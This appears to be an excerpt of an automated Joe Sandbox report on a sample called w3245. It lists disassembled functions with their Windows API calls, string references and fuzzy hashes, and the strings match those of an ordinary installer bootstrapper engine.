                                                                                                                                                                    • CloseHandle.KERNEL32(0094B518,00000000,?,00000000,?,0092D148,00000000), ref: 0092D186
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,?,00000000,?,0092D148,00000000), ref: 0092D193
                                                                                                                                                                    • UnmapViewOfFile.KERNEL32(0094B4E8,00000000,?,0092D148,00000000), ref: 0092D1A2
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseHandle$FileUnmapView
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 260491571-0
                                                                                                                                                                    • Opcode ID: 94f56c31da1c3384d961cae6702edb693ab03c6bd6f0f3de744801adc34f9feb
                                                                                                                                                                    • Instruction ID: 6193f691961855d25e73b26df9929428d6741309066e2dd6e095de945557e13b
                                                                                                                                                                    • Opcode Fuzzy Hash: 94f56c31da1c3384d961cae6702edb693ab03c6bd6f0f3de744801adc34f9feb
                                                                                                                                                                    • Instruction Fuzzy Hash: BF014636406B25DFDB31AF66E880806F7EDAF50311305C93EE1A652935C371A8A0DF80
                                                                                                                                                                    APIs
                                                                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,00000000,00000000,clbcatq.dll,00000000,clbcatq.dll,00000000,00000000,00000000), ref: 00948820
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0094882A
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Time$ErrorFileLastSystem
                                                                                                                                                                    • String ID: clbcatq.dll$timeutil.cpp
                                                                                                                                                                    • API String ID: 2781989572-961924111
                                                                                                                                                                    • Opcode ID: 5207113ff20567d215752ce75b3e5b191f13f98626489b4783affad26ac3578b
                                                                                                                                                                    • Instruction ID: c56705771e932c145494abc6a1427faa45219e55b69c52666f296953ceb92424
                                                                                                                                                                    • Opcode Fuzzy Hash: 5207113ff20567d215752ce75b3e5b191f13f98626489b4783affad26ac3578b
                                                                                                                                                                    • Instruction Fuzzy Hash: 29412876E1021976D7219BB88C05FBF77B9AF91700F658929FA01B7280EE35CE0097A1
                                                                                                                                                                    APIs
                                                                                                                                                                    • VariantInit.OLEAUT32(000002C0), ref: 009436E6
                                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 009436F6
                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 009437D5
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Variant$AllocClearInitString
                                                                                                                                                                    • String ID: xmlutil.cpp
                                                                                                                                                                    • API String ID: 2213243845-1270936966
                                                                                                                                                                    • Opcode ID: 3b0d987211688d60bd67e4833c6b93ddb44edf2dc6b296f77d17f3c50172a225
                                                                                                                                                                    • Instruction ID: 4fe742e00e089186503610493a90d195ab80dca4b05d11456a795a0309796d74
                                                                                                                                                                    • Opcode Fuzzy Hash: 3b0d987211688d60bd67e4833c6b93ddb44edf2dc6b296f77d17f3c50172a225
                                                                                                                                                                    • Instruction Fuzzy Hash: 404153B5A10229ABCB119FB5C888EAFBBACAF45750F1581A4FD55EB211D634DE008B90
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegEnumKeyExW.ADVAPI32(00000000,000002C0,00000410,00000002,00000000,00000000,00000000,00000000,00000410,00000002,00000100,00000000,00000000,?,?,00928E1B), ref: 00940EAA
                                                                                                                                                                    • RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00928E1B,00000000), ref: 00940EC8
                                                                                                                                                                    • RegEnumKeyExW.ADVAPI32(00000000,000002C0,00000410,00000002,00000000,00000000,00000000,00000000,00000410,00000003,?,?,00928E1B,00000000,00000000,00000000), ref: 00940F1E
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Enum$InfoQuery
                                                                                                                                                                    • String ID: regutil.cpp
                                                                                                                                                                    • API String ID: 73471667-955085611
                                                                                                                                                                    • Opcode ID: 8f0d5fa634c1ba12245e82fdbf8b73e5d380731e5de01c22ca642d2924bc60d2
                                                                                                                                                                    • Instruction ID: ae2a14f847b85e15935942f30b1fc9386b322e5b340b2e9b4360246df0272293
                                                                                                                                                                    • Opcode Fuzzy Hash: 8f0d5fa634c1ba12245e82fdbf8b73e5d380731e5de01c22ca642d2924bc60d2
                                                                                                                                                                    • Instruction Fuzzy Hash: 1F31A176901129BFEB318B95CD84EAFBB6CEF84760F1544A5BE04AB210E7719E1096A0
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00940F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0096AAA0,00000000,?,009457E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00940F80
                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000088,00000000,000002C0,00000410,00020019,00000000,000002C0,00000000,?,?,?,00928E57,00000000,00000000), ref: 00928BD4
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to initialize package from related bundle id: %ls, xrefs: 00928BBA
                                                                                                                                                                    • Failed to ensure there is space for related bundles., xrefs: 00928B87
                                                                                                                                                                    • Failed to open uninstall key for potential related bundle: %ls, xrefs: 00928B43
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseOpen
                                                                                                                                                                    • String ID: Failed to ensure there is space for related bundles.$Failed to initialize package from related bundle id: %ls$Failed to open uninstall key for potential related bundle: %ls
                                                                                                                                                                    • API String ID: 47109696-1717420724
                                                                                                                                                                    • Opcode ID: e397894ee51d9c0fe791c7f8fa18779759055e0e9559e57ea5a1681f020717f9
                                                                                                                                                                    • Instruction ID: 174e9cee88358f7ebca893f17a21c2086b801fbc18b83dbc6e821813e48649a2
                                                                                                                                                                    • Opcode Fuzzy Hash: e397894ee51d9c0fe791c7f8fa18779759055e0e9559e57ea5a1681f020717f9
                                                                                                                                                                    • Instruction Fuzzy Hash: 6E21B072941229FFDF129E90EC0AFAFBB78EF44315F104059F910A6190EB759A20EB90
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,80004005,00000000,00000000,00000100,?,00901474,00000000,80004005,00000000,80004005,00000000,000001C7,?,009013B8), ref: 00903B33
                                                                                                                                                                    • HeapReAlloc.KERNEL32(00000000,?,00901474,00000000,80004005,00000000,80004005,00000000,000001C7,?,009013B8,000001C7,00000100,?,80004005,00000000), ref: 00903B3A
                                                                                                                                                                      • Part of subcall function 0090394F: GetProcessHeap.KERNEL32(?,000001C7,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903960
                                                                                                                                                                      • Part of subcall function 0090394F: RtlAllocateHeap.NTDLL(00000000,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903967
                                                                                                                                                                      • Part of subcall function 00903BD3: GetProcessHeap.KERNEL32(00000000,000001C7,?,009021CC,000001C7,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903BDB
                                                                                                                                                                      • Part of subcall function 00903BD3: HeapSize.KERNEL32(00000000,?,009021CC,000001C7,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903BE2
                                                                                                                                                                    • _memcpy_s.LIBCMT ref: 00903B86
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$Process$AllocAllocateSize_memcpy_s
                                                                                                                                                                    • String ID: memutil.cpp
                                                                                                                                                                    • API String ID: 3406509257-2429405624
                                                                                                                                                                    • Opcode ID: 4dbd4c72e265171011b9060f10ec6a543aaff9867413428653ce50235169977d
                                                                                                                                                                    • Instruction ID: 0f7ab69e9884636633447866ca0dfc2855bf55834e24731bad99eb4509474454
                                                                                                                                                                    • Opcode Fuzzy Hash: 4dbd4c72e265171011b9060f10ec6a543aaff9867413428653ce50235169977d
                                                                                                                                                                    • Instruction Fuzzy Hash: 7A11E131604518AFCB226E68CC48E7E3B5E9F81728B05C225FC149B2E2E775CF1092D0
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00948991
                                                                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 009489B9
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 009489C3
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLastTime$FileSystem
                                                                                                                                                                    • String ID: inetutil.cpp
                                                                                                                                                                    • API String ID: 1528435940-2900720265
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00940F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0096AAA0,00000000,?,009457E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00940F80
                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,00000001,feclient.dll,?,?,?,00913FB5,feclient.dll,?,00000000,?,?,?,00904B12), ref: 00913B42
                                                                                                                                                                      • Part of subcall function 009410B5: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 0094112B
                                                                                                                                                                      • Part of subcall function 009410B5: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00941163
                                                                                                                                                                    Strings
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: QueryValue$CloseOpen
                                                                                                                                                                    • String ID: Logging$SOFTWARE\Policies\Microsoft\Windows\Installer$feclient.dll
                                                                                                                                                                    • API String ID: 1586453840-3596319545
                                                                                                                                                                    APIs
                                                                                                                                                                    • lstrlenA.KERNEL32(009212CF,00000000,00000000,?,?,?,00940013,009212CF,009212CF,?,00000000,0000FDE9,?,009212CF,8007139F,Invalid operation for this state.), ref: 00940776
                                                                                                                                                                    • WriteFile.KERNEL32(FFFFFFFF,00000000,00000000,?,00000000,?,?,00940013,009212CF,009212CF,?,00000000,0000FDE9,?,009212CF,8007139F), ref: 009407B2
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00940013,009212CF,009212CF,?,00000000,0000FDE9,?,009212CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 009407BC
                                                                                                                                                                    Strings
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFileLastWritelstrlen
                                                                                                                                                                    • String ID: logutil.cpp
                                                                                                                                                                    • API String ID: 606256338-3545173039
                                                                                                                                                                    APIs
                                                                                                                                                                    • CommandLineToArgvW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,ignored ,00000000,?,00000000,?,?,?,0090523F,00000000,?), ref: 00901248
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,0090523F,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 00901252
                                                                                                                                                                    Strings
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ArgvCommandErrorLastLine
                                                                                                                                                                    • String ID: apputil.cpp$ignored
                                                                                                                                                                    • API String ID: 3459693003-568828354
                                                                                                                                                                    APIs
                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,00000002,00000000,?,?,0092D3EE,00000000,00000000,00000000,?), ref: 0092D1C3
                                                                                                                                                                    • ReleaseMutex.KERNEL32(?,?,0092D3EE,00000000,00000000,00000000,?), ref: 0092D24A
                                                                                                                                                                      • Part of subcall function 0090394F: GetProcessHeap.KERNEL32(?,000001C7,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903960
                                                                                                                                                                      • Part of subcall function 0090394F: RtlAllocateHeap.NTDLL(00000000,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903967
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to allocate memory for message data, xrefs: 0092D212
                                                                                                                                                                    • NetFxChainer.cpp, xrefs: 0092D208
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$AllocateMutexObjectProcessReleaseSingleWait
                                                                                                                                                                    • String ID: Failed to allocate memory for message data$NetFxChainer.cpp
                                                                                                                                                                    • API String ID: 2993511968-1624333943
                                                                                                                                                                    APIs
                                                                                                                                                                    • FormatMessageW.KERNEL32(0090428F,0090548E,?,00000000,00000000,00000000,?,80070656,?,?,?,0091E75C,00000000,0090548E,00000000,80070656), ref: 00901F9A
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,0091E75C,00000000,0090548E,00000000,80070656,?,?,009140BF,0090548E,?,80070656,00000001,crypt32.dll), ref: 00901FA7
                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,00000000,00000000,?,?,?,0091E75C,00000000,0090548E,00000000,80070656,?,?,009140BF,0090548E), ref: 00901FEE
                                                                                                                                                                    Strings
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFormatFreeLastLocalMessage
                                                                                                                                                                    • String ID: strutil.cpp
                                                                                                                                                                    • API String ID: 1365068426-3612885251
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00940F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0096AAA0,00000000,?,009457E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00940F80
                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000001,00000000,00000001,00000000,?,?,00020006,00000000,00000001,00000000), ref: 00910791
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to update name and publisher., xrefs: 0091077B
                                                                                                                                                                    • Failed to update resume mode., xrefs: 00910762
                                                                                                                                                                    • Failed to open registration key., xrefs: 00910748
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseOpen
                                                                                                                                                                    • String ID: Failed to open registration key.$Failed to update name and publisher.$Failed to update resume mode.
                                                                                                                                                                    • API String ID: 47109696-1865096027
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateFileW.KERNEL32(0094B500,40000000,00000001,00000000,00000002,00000080,00000000,009104BF,00000000,?,0090F4F4,?,00000080,0094B500,00000000), ref: 00944DCB
                                                                                                                                                                    • GetLastError.KERNEL32(?,0090F4F4,?,00000080,0094B500,00000000,?,009104BF,?,00000094,?,?,?,?,?,00000000), ref: 00944DD8
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,?,0090F4F4,?,0090F4F4,?,00000080,0094B500,00000000,?,009104BF,?,00000094), ref: 00944E2C
                                                                                                                                                                    Strings
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseCreateErrorFileHandleLast
                                                                                                                                                                    • String ID: fileutil.cpp
                                                                                                                                                                    • API String ID: 2528220319-2967768451
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateFileW.KERNEL32(00000000,00000080,00000001,00000000,00000003,00000080,00000000,000002C0,00000000,?,00928C76,00000000,00000088,000002C0,BundleCachePath,00000000), ref: 009449AE
                                                                                                                                                                    • GetLastError.KERNEL32(?,00928C76,00000000,00000088,000002C0,BundleCachePath,00000000,000002C0,BundleVersion,000000B8,000002C0,EngineVersion,000002C0,000000B0), ref: 009449BB
                                                                                                                                                                    Strings
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateErrorFileLast
                                                                                                                                                                    • String ID: fileutil.cpp
                                                                                                                                                                    • API String ID: 1214770103-2967768451
                                                                                                                                                                    APIs
                                                                                                                                                                    • ControlService.ADVAPI32(00926AFD,00000001,?,00000001,00000000,?,?,?,?,?,?,00926AFD,00000000), ref: 00926C13
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,00926AFD,00000000), ref: 00926C1D
                                                                                                                                                                    Strings
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ControlErrorLastService
                                                                                                                                                                    • String ID: Failed to stop wusa service.$msuengine.cpp
                                                                                                                                                                    • API String ID: 4114567744-2259829683
                                                                                                                                                                    APIs
                                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 009439F4
                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00943A27
                                                                                                                                                                    Strings
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: String$AllocFree
                                                                                                                                                                    • String ID: `<u$xmlutil.cpp
                                                                                                                                                                    • API String ID: 344208780-3482516102
                                                                                                                                                                    APIs
                                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 0094396E
                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 009439A1
                                                                                                                                                                    Strings
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: String$AllocFree
                                                                                                                                                                    • String ID: `<u$xmlutil.cpp
                                                                                                                                                                    • API String ID: 344208780-3482516102
                                                                                                                                                                    APIs
                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 0094690F
                                                                                                                                                                      • Part of subcall function 00948713: SystemTimeToFileTime.KERNEL32(?,00000000,00000000,clbcatq.dll,00000000,clbcatq.dll,00000000,00000000,00000000), ref: 00948820
                                                                                                                                                                      • Part of subcall function 00948713: GetLastError.KERNEL32 ref: 0094882A
                                                                                                                                                                    Strings
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Time$ErrorFileFreeLastStringSystem
                                                                                                                                                                    • String ID: `<u$atomutil.cpp$clbcatq.dll
                                                                                                                                                                    • API String ID: 211557998-1658759192
                                                                                                                                                                    APIs
                                                                                                                                                                    • PostThreadMessageW.USER32(?,00009002,00000000,?), ref: 0091ECED
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0091ECF7
                                                                                                                                                                    Strings
                                                                                                                                                                    • EngineForApplication.cpp, xrefs: 0091ED1B
                                                                                                                                                                    • Failed to post elevate message., xrefs: 0091ED25
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLastMessagePostThread
                                                                                                                                                                    • String ID: EngineForApplication.cpp$Failed to post elevate message.
                                                                                                                                                                    • API String ID: 2609174426-4098423239
                                                                                                                                                                    • Opcode ID: 96cd4d337e3c9aa49b99eb2b270d12bc6b62080c28f732643532f63b87adaea7
                                                                                                                                                                    • Instruction ID: 305f9fafd77404f2bfcec20ab6d822b6d780626b0aef02aecc28554acb371f47
                                                                                                                                                                    • Opcode Fuzzy Hash: 96cd4d337e3c9aa49b99eb2b270d12bc6b62080c28f732643532f63b87adaea7
                                                                                                                                                                    • Instruction Fuzzy Hash: 47F0F63BB40239ABC7205A99AC09FC67B88AF40B31B258224FF14AF1D1D765CC01C3D4
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetProcAddress.KERNEL32(?,BootstrapperApplicationDestroy), ref: 0090D903
                                                                                                                                                                    • FreeLibrary.KERNEL32(?,?,009048D7,00000000,?,?,0090548E,?,?), ref: 0090D912
                                                                                                                                                                    • GetLastError.KERNEL32(?,009048D7,00000000,?,?,0090548E,?,?), ref: 0090D91C
                                                                                                                                                                    Strings
                                                                                                                                                                    • BootstrapperApplicationDestroy, xrefs: 0090D8FB
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressErrorFreeLastLibraryProc
                                                                                                                                                                    • String ID: BootstrapperApplicationDestroy
                                                                                                                                                                    • API String ID: 1144718084-3186005537
                                                                                                                                                                    • Opcode ID: b643a21dbb92210331b75ea03b4d8b9c28b9a46ac0b0888aec14cab53006f9cf
                                                                                                                                                                    • Instruction ID: ecbfa3ca66914cb7ee3875bf5e1c40c5a47296d9cac632a910841498399f3c60
                                                                                                                                                                    • Opcode Fuzzy Hash: b643a21dbb92210331b75ea03b4d8b9c28b9a46ac0b0888aec14cab53006f9cf
                                                                                                                                                                    • Instruction Fuzzy Hash: FCF06832616726AFC3204FAAD804F16F7A8BF457627018229E825D6560D761EC10DBD0
                                                                                                                                                                    APIs
                                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 00943200
                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00943230
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: String$AllocFree
                                                                                                                                                                    • String ID: `<u$xmlutil.cpp
                                                                                                                                                                    • API String ID: 344208780-3482516102
                                                                                                                                                                    • Opcode ID: 3d99446cd033271a4f9c78bdc1542a22660cde97437490ff5bd9f06772a27d21
                                                                                                                                                                    • Instruction ID: 9b80876dfda06fcbb9fd3f32b4c14947bcc83214f17a2373ce9ad23c9622286e
                                                                                                                                                                    • Opcode Fuzzy Hash: 3d99446cd033271a4f9c78bdc1542a22660cde97437490ff5bd9f06772a27d21
                                                                                                                                                                    • Instruction Fuzzy Hash: 63F0E235102655EBC7310FA59C08F6B77ACAF81B60F24C029FC186B210C7B4CE1097E0
                                                                                                                                                                    APIs
                                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 009434AD
                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 009434DD
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: String$AllocFree
                                                                                                                                                                    • String ID: `<u$xmlutil.cpp
                                                                                                                                                                    • API String ID: 344208780-3482516102
                                                                                                                                                                    • Opcode ID: a3c342cba8bd8d8658ad3b1e25075bb24369256254f54ee30c875fb730077dd5
                                                                                                                                                                    • Instruction ID: 92255df4fed2def88716361d4c873145bd63d2fb12eadb8a9400a7028800898f
                                                                                                                                                                    • Opcode Fuzzy Hash: a3c342cba8bd8d8658ad3b1e25075bb24369256254f54ee30c875fb730077dd5
                                                                                                                                                                    • Instruction Fuzzy Hash: EEF05E35241215ABCB335F69AC09E9B7BACAB82B61F15C11AFC099B260C775DE10D6E0
                                                                                                                                                                    APIs
                                                                                                                                                                    • PostThreadMessageW.USER32(?,00009001,00000000,?), ref: 0091F2EE
